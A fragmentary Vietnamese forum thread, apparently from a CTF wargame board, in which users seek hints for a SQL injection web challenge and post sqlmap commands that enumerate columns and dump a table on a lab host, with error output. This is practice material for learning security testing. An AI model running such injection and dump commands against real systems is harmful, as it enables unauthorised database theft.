Giúp mình bài WEB006 với?
Mình thấy nó lỗi sql injection. tìm tất cả các bảng mà chẳng thấy flag đâu cả -_-.
@ 2009 - 2021 Bkav Corporation
vlong0595;n58002 đã viết:Gợi ý giúp mình là do mình viết lệnh thiếu hay do điều gì vậy. Mình mới tìm hiểu CTF có gì giúp mình với.
Thanks bạn vì những gợi ý nhé.
sqlmap -u [URL]http://lab10.wargame.whitehat.vn/web006/index.php?id=1[/URL] -D db_profile -T tbl_manage --columns
sqlmap.py -u http://lab10.wargame.whitehat.vn/web006/index.php?id=1 -D db_profile -T tbl_manage --dump
[22:46:37] [ERROR] unable to retrieve the number of columns for table 'tbl_manage' in database 'db_profile'
[22:46:37] [WARNING] unable to retrieve column names for table 'tbl_manage' in database 'db_profile'
vlong0595;n58013 đã viết:À ok rồi. Dùng bảng columm của bạn là được. Sao bạn biết thêm flag vào trong đấy hay vậy?
hungnth1996;n58063 đã viết:Mình thấy nó lỗi sql injection. tìm tất cả các bảng mà chẳng thấy flag đâu cả -_-.